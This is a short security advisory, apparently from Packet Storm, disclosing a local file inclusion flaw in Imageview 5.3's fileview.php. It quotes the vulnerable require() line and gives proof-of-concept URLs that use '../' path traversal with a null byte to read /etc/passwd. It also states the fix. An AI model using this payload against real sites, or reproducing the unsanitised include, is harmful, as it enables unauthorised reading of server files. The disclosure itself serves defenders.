Imageview version 5.3 suffers from a local file inclusion vulnerability in fileview.php.
4e2f50d87fa5899eeeafd5f2109a9cfb889df0b2b97119619e14439a41c5be11 \#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| Imageview v5.3 (fileview.php) Local File Inclusion |
| (works only with magic_quotes_gpc = off) |
| coded by DNX |
------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.blackdot.be/?inc=projects/imageview
[!] Detected: 21.04.2007
[!] Reported: 21.04.2007
[!] Remote: yes
[!] Background: Imageview is an image gallery script based on PHP
[!] Bug: $_GET['album'] in fileview.php line 4
require('albums/'.$_GET['album'].'/data.dat');
[!] PoC:
- http://[site]/[path]/fileview.php?album=[file]%00
- http://[site]/[path]/fileview.php?album=../../../../../../etc/passwd%00
[!] Solution: Install Imageview 6 or magic_quotes_gpc = on
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed